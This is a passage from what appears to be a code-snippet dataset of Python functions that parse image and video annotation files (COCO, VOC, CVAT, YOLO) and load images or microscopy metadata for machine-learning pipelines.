dtype=np.float32)\r\n\r\n seg_map = img_info['filename'].replace('jpg', 'png')\r\n\r\n ann = dict(\r\n bboxes=gt_bboxes,\r\n labels=gt_labels,\r\n bboxes_ignore=gt_bboxes_ignore,\r\n masks=gt_masks_ann,\r\n seg_map=seg_map)\r\n\r\n return ann", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def parse_annotations(Hinv, obsmat_txt):\n\n def to_image_frame(loc):\n \"\"\"\n Given H^-1 and (x, y, z) in world coordinates,\n returns (u, v, 1) in image frame coordinates.\n \"\"\"\n loc = np.dot(Hinv, loc) # to camera frame\n return loc / loc[2] # to pixels (from millimeters)\n\n mat = np.loadtxt(obsmat_txt)\n num_peds = int(np.max(mat[:, 1])) + 1\n peds = [np.array([]).reshape(0, 4) for _ in range(num_peds)] # maps ped ID -> (t,x,y,z) path\n\n num_frames = (mat[-1, 0] + 1).astype(\"int\")\n num_unique_frames = np.unique(mat[:, 0]).size\n recorded_frames = [-1] * num_unique_frames # maps timestep -> (first) frame\n peds_in_frame = [[] for _ in range(num_unique_frames)] # maps timestep -> ped IDs\n\n frame = 0\n time = -1\n blqk = False\n for row in mat:\n if row[0] != frame:\n frame = int(row[0])\n time += 1\n recorded_frames[time] = frame\n\n ped = int(row[1])\n\n peds_in_frame[time].append(ped)\n loc = np.array([row[2], row[4], 1])\n loc = to_image_frame(loc)\n loc = [time, loc[0], loc[1], loc[2]]\n peds[ped] = np.vstack((peds[ped], loc))\n\n return recorded_frames, peds_in_frame, peds", "def _parse_ann_info(self, img_info, ann_info):\n gt_bboxes = []\n gt_labels = []\n gt_bboxes_ignore = []\n gt_masks_ann = []\n gt_sample_sites = []\n\n gt_point_coords = []\n gt_point_labels = []\n\n for i, ann in enumerate(ann_info):\n if ann.get(\"ignore\", False):\n continue\n x1, y1, w, h = ann[\"bbox\"]\n inter_w = max(0, min(x1 + w, img_info[\"width\"]) - max(x1, 0))\n inter_h = max(0, min(y1 + h, img_info[\"height\"]) - max(y1, 0))\n if inter_w * inter_h == 0:\n continue\n if ann[\"area\"] <= 0 or w < 1 or h < 1:\n continue\n if ann[\"category_id\"] not in self.cat_ids:\n continue\n bbox = [x1, y1, x1 + w, y1 + h]\n if ann.get(\"iscrowd\", False):\n gt_bboxes_ignore.append(bbox)\n else:\n gt_bboxes.append(bbox)\n gt_labels.append(self.cat2label[ann[\"category_id\"]])\n gt_masks_ann.append(ann.get(\"segmentation\", None))\n if self.kind == \"official\":\n gt_point_coords.append(ann[\"point_coords\"])\n gt_point_labels.append(ann[\"point_labels\"])\n else:\n gt_sample_sites.append(ann[\"sample_sites\"])\n\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n seg_map = img_info[\"filename\"].replace(\"jpg\", \"png\")\n\n ann = dict(\n point_labels=gt_point_labels,\n point_coords=gt_point_coords,\n sample_sites=gt_sample_sites,\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore,\n masks=gt_masks_ann,\n seg_map=seg_map,\n )\n\n return ann", "def read_voc_annotation_file(annotation_file_path, labelmap_dict, has_scores=False):\n root = etree.parse(annotation_file_path)\n image_id = root.find('filename').text\n objects = root.findall('object')\n\n boxes = np.array([]).reshape(0, 4)\n classes = np.array([])\n scores = np.array([])\n\n for item in objects:\n name = item.find('name').text\n class_id = labelmap_dict[name]\n class_array = np.array([class_id])\n classes = np.concatenate([classes, class_array], axis=0)\n\n if has_scores:\n score = item.find('score').text\n score_array = np.array([score]).astype(np.float)\n scores = np.concatenate([scores, score_array], axis=0)\n\n bndbox = item.find('bndbox')\n ymin = bndbox.find('ymin').text\n xmin = bndbox.find('xmin').text\n ymax = bndbox.find('ymax').text\n xmax = bndbox.find('xmax').text\n bndbox_array = np.expand_dims(np.array([ymin, xmin, ymax, xmax]).astype(np.float32), axis=0)\n boxes = np.concatenate([boxes, bndbox_array], axis=0)\n\n if boxes.ndim < 2:\n boxes = np.expand_dims(boxes, axis=0)\n\n classes = classes.astype(np.int32)\n\n if has_scores:\n return image_id, boxes, classes, scores\n else:\n return image_id, boxes, classes", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def process_image(file_path):\n img_array = io.imread(file_path)\n detections, shapes, descriptors = detect_faces(person_database,img_array)\n\n names = []\n\n for desc in descriptors:\n name = find_match(person_database, desc)\n names.append(name)\n\n return pic_array, names, detections, shapes, descriptors", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def parse_function(path,label):\n # Read an image from a file\n image_string = tf.io.read_file(path)\n # Decode it into a dense vector\n image_decoded = tf.image.decode_jpeg(image_string, channels=CHANNELS)\n # Resize it to fixed shape\n image_resized = tf.image.resize(image_decoded, [IMG_SIZE, IMG_SIZE])\n # Normalize it from [0, 255] to [0.0, 1.0]\n image_normalized = image_resized / 255.0\n return image_normalized, label", "def parse_metadata_file(self, file):\n \n file_keys = list(file.keys())\n \n if 'labelAnnotations' in file_keys:\n #file_annots = file['labelAnnotations'][:int(len(file['labelAnnotations']) * 0.5)]\n file_annots = file['labelAnnotations'][:]\n file_top_score = np.asarray([x['score'] for x in file_annots]).mean()\n file_top_desc = [x['description'] for x in file_annots]\n else:\n file_top_score = np.nan\n file_top_desc = ['']\n \n file_colors = file['imagePropertiesAnnotation']['dominantColors']['colors']\n file_crops = file['cropHintsAnnotation']['cropHints']\n\n file_color_score = np.asarray([x['score'] for x in file_colors]).mean()\n file_color_pixelfrac = np.asarray([x['pixelFraction'] for x in file_colors]).mean()\n\n file_crop_conf = np.asarray([x['confidence'] for x in file_crops]).mean()\n \n if 'importanceFraction' in file_crops[0].keys():\n file_crop_importance = np.asarray([x['importanceFraction'] for x in file_crops]).mean()\n else:\n file_crop_importance = np.nan\n\n df_metadata = {\n 'annots_score': file_top_score,\n 'color_score': file_color_score,\n 'color_pixelfrac': file_color_pixelfrac,\n 'crop_conf': file_crop_conf,\n 'crop_importance': file_crop_importance,\n 'annots_top_desc': self.sentence_sep.join(file_top_desc)\n }\n \n df_metadata = pd.DataFrame.from_dict(df_metadata, orient='index').T\n df_metadata = df_metadata.add_prefix('metadata_')\n \n return df_metadata", "def parse(all_blobs, all_angles):", "def _parse_single(filename, label, image_size=IMAGE_SIZE):\n # Decode and convert image to appropriate type\n image = tf.image.decode_png(tf.read_file(filename), channels=image_size[2])\n image = tf.image.convert_image_dtype(image, tf.float32) # Also scales from [0, 255] to [0, 1)\n # Resize according to module requirements\n image = tf.image.resize_images(image, image_size[:2])\n return image, label", "def load_annotations(self, image_index):\n filename = self.image_names[image_index] + '.xml'\n try:\n tree = ET.parse(os.path.join(self.data_dir, 'Annotations', filename))\n return self.__parse_annotations(tree.getroot())\n except ET.ParseError as e:\n raise_from(ValueError('invalid annotations file: {}: {}'.format(filename, e)), None)\n except ValueError as e:\n raise_from(ValueError('invalid annotations file: {}: {}'.format(filename, e)), None)", "def __parse_image(self, image_path: str, image_label: int) -> tuple:\n one_hot = tf.one_hot(image_label, self.num_classes, dtype=dtypes.int32)\n img_file = tf.read_file(image_path)\n img_decoded = tf.image.decode_jpeg(img_file, channels=self.image_shape[2])\n img_decoded = tf.image.resize_images(img_decoded, self.image_shape[0:2])\n img_decoded = tf.cast(img_decoded, tf.float32)\n if self.normalize_images:\n img_decoded = tf.image.per_image_standardization(img_decoded)\n\n return img_decoded, one_hot", "def load_annotations(path, img_w, img_h):\n bboxes = []\n with open(path, 'r') as file:\n for row in file:\n _, xc , yc, w, h = row.split()\n xc = float(xc)*img_w\n yc = float(yc)*img_h\n w = float(w)*img_w\n h = float(h)*img_h\n bboxes.append([xc - w/2 , yc - h/2, xc + w/2 , yc + h/2])\n\n return bboxes", "def _parse_raw_labels(self, lines):\r\n images = []\r\n labels = []\r\n idx = 0\r\n while idx < len(lines):\r\n image_path = lines[idx].strip()\r\n images.append(self._real_image_path(image_path))\r\n idx += 1\r\n\r\n num = int(lines[idx])\r\n idx += 1\r\n\r\n labels_ = []\r\n for _ in range(num):\r\n x1, y1, w, h, blur, expression, illumination, invalid, \\\r\n occlusion, pose = [int(v) \r\n for v in lines[idx].strip().split()]\r\n x2, y2 = x1 + w - 1, y1 + h - 1 # -1 to get the read x2, y2\r\n\r\n labels_.append([x1, y1, x2, y2])\r\n idx += 1\r\n \r\n labels.append(np.array(labels_))\r\n\r\n self._data_map[self._real_image_path(image_path)] = np.array(labels_)\r\n return np.array(images), np.array(labels)", "def parse_function(filenames):\n \n img_filename, gt_filename = filenames['image'], filenames.get('segmentation_mask', None)\n \n # Reading the file and returning its content as bytes:\n image_string = tf.io.read_file(img_filename)\n # Decoding into an image:\n image_decoded = tf.io.decode_jpeg(image_string, channels=3)\n\n # Converting image to float:\n image = tf.image.convert_image_dtype(image_decoded, tf.float32)\n\n \n if gt_filename is not None:\n # Same for GT image:\n gt_string = tf.io.read_file(gt_filename)\n gt_decoded = tf.io.decode_png(gt_string, channels=1)\n \n gt = tf.cast(gt_decoded, dtype=tf.int32)\n \n \n \n return {'image': image, 'segmentation_mask': gt}", "def process_cvat_xml(xml_file, image_dir, output_dir,username,password,ilabels):\n KNOWN_TAGS = {'box', 'image', 'attribute'}\n\n if (image_dir is None):\n image_dir=os.path.join(output_dir,\"data/obj\")\n os.makedirs(image_dir, exist_ok=True)\n\n os.makedirs(output_dir, exist_ok=True)\n cvat_xml = etree.parse(xml_file)\n basename = os.path.splitext( os.path.basename( xml_file ) )[0]\n current_labels = {}\n traintxt = \"\"\n auto_lbl_count = 0\n\n if (ilabels is not None):\n vlabels=ilabels.split(',')\n for _label in vlabels:\n current_labels[_label]=auto_lbl_count\n auto_lbl_count+=1\n\n tracks= cvat_xml.findall( './/track' )\n\n if (tracks is not None) and (len(tracks) > 0):\n frames = {}\n\n for track in tracks:\n trackid = int(track.get(\"id\"))\n label = track.get(\"label\")\n boxes = track.findall( './box' )\n for box in boxes:\n frameid = int(box.get('frame'))\n outside = int(box.get('outside'))\n #occluded = int(box.get('occluded')) #currently unused\n #keyframe = int(box.get('keyframe')) #currently unused\n xtl = float(box.get('xtl'))\n ytl = float(box.get('ytl'))\n xbr = float(box.get('xbr'))\n ybr = float(box.get('ybr'))\n\n frame = frames.get( frameid, {} )\n\n if outside == 0:\n frame[ trackid ] = { 'xtl': xtl, 'ytl': ytl, 'xbr': xbr, 'ybr': ybr, 'label': label }\n\n frames[ frameid ] = frame\n\n width = int(cvat_xml.find('.//original_size/width').text)\n height = int(cvat_xml.find('.//original_size/height').text)\n\n taskid = int(cvat_xml.find('.//task/id').text)\n\n urlsegment = cvat_xml.find(\".//segments/segment/url\").text\n urlbase = urlsegment.split(\"?\")[0]\n\n httpclient = requests.session()\n httpclient.get(urlbase)\n\n csrftoken = \"none\"\n sessionid = \"none\"\n\n # Spit out a list of each object for each frame\n for frameid in sorted(frames.keys()):\n image_name = \"%s_%08d.jpg\" % (basename, frameid)\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n if username is None:\n log.warn('{} image cannot be found. Is `{}` image directory correct?\\n'.format(image_path, image_dir))\n else:\n log.info('{} image cannot be found. Downloading from task ID {}\\n'.format(image_path, taskid))\n\n if sessionid == \"none\":\n if \"csrftoken\" in httpclient.cookies:\n csrftoken = httpclient.cookies[\"csrftoken\"]\n elif \"csrf\" in httpclient.cookies:\n csrftoken = httpclient.cookies[\"csrf\"]\n\n login_data = dict(username=username, password=password,\n csrfmiddlewaretoken=csrftoken, next='/dashboard')\n\n urllogin = urlbase+\"/auth/login\"\n httpclient.post(urllogin, data=login_data,\n headers=dict(Referer=urllogin))\n\n if (\"sessionid\" in httpclient.cookies):\n sessionid = httpclient.cookies[\"sessionid\"]\n\n url = urlbase+\"/api/v1/tasks/\"+str(taskid)+\"/frames/\"+ str(frameid)\n\n req = httpclient.get(url, headers=dict(\n csrftoken=csrftoken, sessionid=sessionid))\n\n with open(image_path, 'wb') as fo:\n fo.write(req.content)\n print('Url saved as %s\\n' % image_path)\n\n\n frame = frames[frameid]\n\n _yoloAnnotationContent=\"\"\n\n objids = sorted(frame.keys())\n\n for objid in objids:\n\n box = frame[objid]\n\n label = box.get('label')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n if not label in current_labels:\n current_labels[label] = auto_lbl_count\n auto_lbl_count+=1\n\n labelid=current_labels[label]\n yolo_x= (xmin + ((xmax-xmin)/2))/width\n yolo_y= (ymin + ((ymax-ymin)/2))/height\n yolo_w = (xmax - xmin) / width\n yolo_h = (ymax - ymin) / height\n\n if len(_yoloAnnotationContent) != 0:\n _yoloAnnotationContent += \"\\n\"\n\n _yoloAnnotationContent+=str(labelid)+\" \"+\"{:.6f}\".format(yolo_x) +\" \"+\"{:.6f}\".format(yolo_y) +\" \"+\"{:.6f}\".format(yolo_w) +\" \"+\"{:.6f}\".format(yolo_h)\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.txt')\n anno_path = os.path.join(image_dir, anno_name)\n\n _yoloFile = open(anno_path, \"w\", newline=\"\\n\")\n _yoloFile.write(_yoloAnnotationContent)\n _yoloFile.close()\n\n if len(traintxt)!=0:\n traintxt+=\"\\n\"\n\n traintxt+=image_path\n\n else:\n for img_tag in cvat_xml.findall('image'):\n image_name = img_tag.get('name')\n width = img_tag.get('width')\n height = img_tag.get('height')\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. Is `{}` image directory correct?'.\n format(image_path, image_dir))\n\n unknown_tags = {x.tag for x in img_tag.iter()}.difference(KNOWN_TAGS)\n if unknown_tags:\n log.warn('Ignoring tags for image {}: {}'.format(image_path, unknown_tags))\n\n _yoloAnnotationContent = \"\"\n\n for box in img_tag.findall('box'):\n label = box.get('label')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n if not label in current_labels:\n current_labels[label] = auto_lbl_count\n auto_lbl_count += 1\n\n labelid = current_labels[label]\n yolo_x = (xmin + ((xmax-xmin)/2))/width\n yolo_y = (ymin + ((ymax-ymin)/2))/height\n yolo_w = (xmax - xmin) / width\n yolo_h = (ymax - ymin) / height\n\n if len(_yoloAnnotationContent) != 0:\n _yoloAnnotationContent += \"\\n\"\n\n _yoloAnnotationContent += str(labelid)+\" \"+\"{:.6f}\".format(yolo_x) + \" \"+\"{:.6f}\".format(\n yolo_y) + \" \"+\"{:.6f}\".format(yolo_w) + \" \"+\"{:.6f}\".format(yolo_h)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.txt')\n anno_path = os.path.join(image_dir, anno_name)\n\n _yoloFile = open(anno_path, \"w\", newline=\"\\n\")\n _yoloFile.write(_yoloAnnotationContent)\n _yoloFile.close()\n\n traintxt_file=open(output_dir+\"/train.txt\",\"w\",newline=\"\\n\")\n traintxt_file.write(traintxt)\n traintxt_file.close()", "def parse_path_image(proto_path, instance, model_path):\n\n # split the file name into parts\n name_parts = proto_path.split('_')\n # get the base path for the current model\n base_path = eval('instance.request.user.profile.' + model_path)\n # get the different parameters from the model\n # get the date\n date = datetime.datetime.strptime(name_parts[0], '%Y%m%d')\n\n # get the animal\n animal = Mouse.objects.get(mouse_name='_'.join(name_parts[1:4]))\n\n # get the region\n region = name_parts[4]\n\n # define the path for the different files\n bfpath = join(base_path, '_'.join((name_parts[0], animal.mouse_name, 'BF', region)) + '.tif')\n flpath = bfpath.replace('BF', 'FL')\n flgreenpath = bfpath.replace('BF', 'FLgreen')\n otherpath = bfpath.replace('BF', 'OTHER')\n\n return {'owner': instance.request.user,\n 'mouse': animal,\n 'window_date': date,\n 'bfPath': bfpath,\n 'flPath': flpath,\n 'flgreenPath': flgreenpath,\n 'otherPath': otherpath,\n 'region': region}", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def do_parse_annotations(xmls_path_in, xml_path_out):\n label = \"puzzle piece\"\n new_xml = \"<?xml version='1.0' encoding='ISO-8859-1'?>\"\n new_xml += \"<dataset>\\n<name>Puzzle dataset</name>\\n<comment>Created by imglab tool.</comment>\\n\"\n new_xml += \"<images>\\n\"\n for i, annot in enumerate(glob.glob(xmls_path_in + \"/*.xml\")):\n tree = ET.parse(annot)\n root = tree.getroot()\n left = root[6][4][0].text\n top = root[6][4][1].text\n width = 70#str(int(root[6][4][2].text) - int(left))\n height = 70#str(int(root[6][4][3].text) - int(top))\n new_xml += \"{}<image file='{}jpg'>\\n\".format(1 * ' ', annot[:-3])\n new_xml += \"{}<box top='{}' left='{}' width='{}' height='{}'>\\n\".format(2 * ' ', top, left, width, height)\n new_xml += \"{}<label>{}</label>\\n{}</box>\\n'{}</image>\\n\".format(3 * ' ', label, 2 * ' ', 1 * ' ')\n\n new_xml += \"</images>\\n</dataset>\"\n out_file = open(xml_path_out, \"w\")\n out_file.write(new_xml)\n out_file.close()", "def filter_valid_data(image_dir, anno_path):\n images = []\n image_path_dict = {}\n image_anno_dict = {}\n if not os.path.isdir(image_dir):\n raise RuntimeError(\"Path given is not valid.\")\n if not os.path.isfile(anno_path):\n raise RuntimeError(\"Annotation file is not valid.\")\n\n with open(anno_path, \"rb\") as f:\n lines = f.readlines()\n for img_id, line in enumerate(lines):\n line_str = line.decode(\"utf-8\").strip()\n line_split = str(line_str).split(' ')\n file_name = line_split[0]\n image_path = os.path.join(image_dir, file_name)\n if os.path.isfile(image_path):\n images.append(img_id)\n image_path_dict[img_id] = image_path\n image_anno_dict[img_id] = anno_parser(line_split[1:])\n\n return images, image_path_dict, image_anno_dict", "def parse_image_annotations(self, image_dir, annotations):\n filename_ids = {}\n for i, annot in enumerate(annotations['images']):\n filename_ids[annot['file_name']] = i\n\n # order image data by file name\n images_annot_by_fname = {}\n for i, annot in enumerate(annotations['images']):\n images_annot_by_fname[annot['file_name']] = {\n \"file_name\": os.path.join(image_dir, annot['file_name']),\n \"width\": annot['width'],\n \"height\": annot['height'],\n \"id\": annot['id'],\n \"coco_url\": annot['coco_url'],\n }\n\n # order image data by file id\n images_fname_by_id = {}\n for i, annot in enumerate(annotations['images']):\n images_fname_by_id[annot['id']] = annot['file_name']\n\n return filename_ids, images_annot_by_fname, images_fname_by_id", "def parse(self, calibration_px=1.0):\n self.isParsingNeeded = False\n self.meta_data = {}\n self.data = []\n #CZI files\n if self.extend == '.czi':\n with czifile.CziFile(self.file_path) as czi:\n data = czi.asarray()\n Header_Metadata = str(czi).split('<ImageDocument>')\n string = '<ImageDocument>'+Header_Metadata[1]\n #print(string.strip(\"'\"))\n metadata = XMLET.fromstring(string.strip(\"'\"))\n try:\n #Query XML fore the metadata for picture shape(X;Y;Z-stacks).\n #Picture Shape.\n shapes = metadata.findall('./Metadata/Information/Image')[0]\n self.meta_data[\"ShapeSizeX\"] = int(shapes.findall('SizeX')[0].text)\n self.meta_data[\"ShapeSizeY\"] = int(shapes.findall('SizeY')[0].text)\n try:\n self.meta_data[\"ShapeSizeZ\"] = int(shapes.findall('SizeZ')[0].text)\n except:\n self.meta_data[\"ShapeSizeZ\"] = 1\n #Get the hyperstack dimension if the image is a hyperstack.\n try:\n self.meta_data[\"ShapeSizeC\"] = int(shapes.findall('SizeC')[0].text)\n except:\n self.meta_data[\"ShapeSizeC\"] = 1\n print(\"No info of color channels 1 assumed\")\n #Get physical pixel size of image(nm/px) convert to(µm/px).\n PixelSizes = metadata.findall('./Metadata/Scaling/Items/Distance')\n self.meta_data['SizeX'] = float(PixelSizes[0].findall('Value')[0].text)*10**6\n self.meta_data['SizeY'] = float(PixelSizes[1].findall('Value')[0].text)*10**6\n self.meta_data['SizeZ'] = float(PixelSizes[2].findall('Value')[0].text)*10**6\n except(ValueError):\n print (\"Metadata fail\")\n\n #Tiff files.\n #Tiff files are problematic because they most likely wont contain the necessary metadata.\n #Try to get the shape info over common dimensions.\n elif self.extend == '.tif':\n with tifffile.TiffFile(self.file_path) as tif:\n data = tif.asarray()\n for shape in data.shape:\n if shape <5:\n self.meta_data[\"ShapeSizeC\"] = shape\n elif shape <40:\n self.meta_data[\"ShapeSizeZ\"] = shape\n else:\n self.meta_data[\"ShapeSizeY\"] = shape\n self.meta_data[\"ShapeSizeX\"] = shape\n\n #Read Lsm Files.\n elif self.extend == '.lsm':\n with tifffile.TiffFile(self.file_path) as tif:\n data = tif.asarray(memmap=True)\n headerMetadata = str(tif.pages[0].cz_lsm_scan_info)\n metadataList = headerMetadata.split(\"\\n*\")\n #Get image shape from lsm header SizeC=0 if not given.\n for shapes in metadataList:\n if \"images_height\" in shapes:\n self.meta_data[\"ShapeSizeX\"]= int(shapes.split()[-1])\n if \"images_width\" in shapes:\n self.meta_data[\"ShapeSizeY\"]= int(shapes.split()[-1])\n if \"images_number_planes\" in shapes:\n self.meta_data[\"ShapeSizeZ\"]= int(shapes.split()[-1])\n if \"images_number_channels\" in shapes:\n self.meta_data[\"ShapeSizeC\"]= int(shapes.split()[-1])\n #Get physical pixel size of image(nm/px) convert to(µm/px).\n data = np.swapaxes(data,1,2)\n lsm_header = str(tif.pages[0].tags.cz_lsm_info)\n LsmInfo = lsm_header.split(\", \")\n i = 0\n #Query for pixel size.\n for element in LsmInfo:\n if \"e-0\" in element:\n i += 1\n if i == 1:\n self.meta_data['SizeX'] = (float(element)*10**6)\n if i == 2:\n self.meta_data['SizeY'] = (float(element)*10**6)\n if i == 3:\n self.meta_data['SizeZ'] = (float(element)*10**6)\n\n elif self.extend == \".png\":\n data = misc.imread(self.file_path)\n data = np.expand_dims(np.expand_dims(data[...,0],0),0)\n self.meta_data[\"ShapeSizeC\"] = 1\n self.meta_data[\"ShapeSizeZ\"] = 1\n self.meta_data[\"ShapeSizeX\"] = data.shape[2]\n self.meta_data[\"ShapeSizeY\"] = data.shape[3]\n self.meta_data[\"SizeZ\"] = 1\n self.meta_data[\"SizeX\"] = 0.01\n self.meta_data[\"SizeY\"] = 0.01\n #Bring all formats in the same shape.\n self.data = np.reshape(data,(self.meta_data[\"ShapeSizeC\"],self.meta_data[\"ShapeSizeZ\"],self.meta_data[\"ShapeSizeX\"],self.meta_data[\"ShapeSizeY\"]))\n self.meta_data['ChannelNum'] = self.meta_data[\"ShapeSizeC\"]\n #Set pixel size to manuell value if there are no metadata.\n if self.meta_data == {}:\n self.set_calibration(calibration_px)\n #Set the box for manuel calibration to the actuell pixel size.", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def process_image(self):\n\n detect.main(self.nn_args)", "def test_nominal_case(self):\n\n image_filename, boxes = list(annotation.read(self.filename))\n self.assertEqual(image_filename, 'image.jpg')\n self.assertEqual(len(boxes), 2)\n width = 400\n height = 300\n b = boxes[0]\n self.assertEqual(b.xmin, 10 / width)\n self.assertEqual(b.ymin, 20 / height)\n self.assertEqual(b.xmax, 30 / width)\n self.assertEqual(b.ymax, 40 / height)", "def annotate(path):\n if path.startswith('http') or path.startswith('gs:'):\n image = types. Image()\n image.source.image_uri = path\n else:\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n web_detection = client.web_detection(image=image).web_detection\n return web_detection", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_annotations(self, image_index):\n\t\t\t# Get ground truth annotations.\n\t\t\tannotations_ids = self.coco.getAnnIds(imgIds=self.image_ids[image_index], iscrowd=False)\n\t\t\tannotations = {'labels': np.empty((0,)), 'bboxes': np.empty((0, 4))}\n\n\t\t\t# If needed get info for masks.\n\t\t\tif self.mask:\n\t\t\t\timport cv2\n\n\t\t\t\t# Get image info.\n\t\t\t\timage_info = self.coco.loadImgs(self.image_ids[image_index])[0]\n\t\t\t\tannotations['masks'] = []\n\n\t\t\t# Some images appear to miss annotations (like image with id 257034).\n\t\t\tif len(annotations_ids) == 0:\n\t\t\t\treturn annotations\n\n\n\t\t\t# Parse annotations\n\t\t\tcoco_annotations = self.coco.loadAnns(annotations_ids)\n\t\t\tfor idx, a in enumerate(coco_annotations):\n\t\t\t\t# Some annotations have basically no width / height, skip them.\n\t\t\t\tif a['bbox'][2] < 1 or a['bbox'][3] < 1:\n\t\t\t\t\tcontinue\n\n\t\t\t\tannotations['labels'] = np.concatenate([annotations['labels'], [self.coco_label_to_label(a['category_id'])]], axis=0)\n\t\t\t\tannotations['bboxes'] = np.concatenate([annotations['bboxes'], [[\n\t\t\t\t\ta['bbox'][0],\n\t\t\t\t\ta['bbox'][1],\n\t\t\t\t\ta['bbox'][0] + a['bbox'][2],\n\t\t\t\t\ta['bbox'][1] + a['bbox'][3],\n\t\t\t\t]]], axis=0)\n\n\t\t\t\t# If needed get annotations for masks.\n\t\t\t\tif self.mask:\n\t\t\t\t\tif 'segmentation' not in a:\n\t\t\t\t\t\traise ValueError('Expected \\'segmentation\\' key in annotation, got: {}'.format(a))\n\n\t\t\t\t\tmask = np.zeros((image_info['height'], image_info['width'], 1), dtype=np.uint8)\n\t\t\t\t\tfor seg in a['segmentation']:\n\t\t\t\t\t\tpoints = np.array(seg).reshape((len(seg) // 2, 2)).astype(int)\n\n\t\t\t\t\t\t# Draw mask.\n\t\t\t\t\t\tcv2.fillPoly(mask, [points.astype(int)], (1,))\n\n\t\t\t\t\tannotations['masks'].append(mask.astype(float))\n\n\n\t\t\treturn annotations", "def _process_image(filename, coder):\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n \n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n # 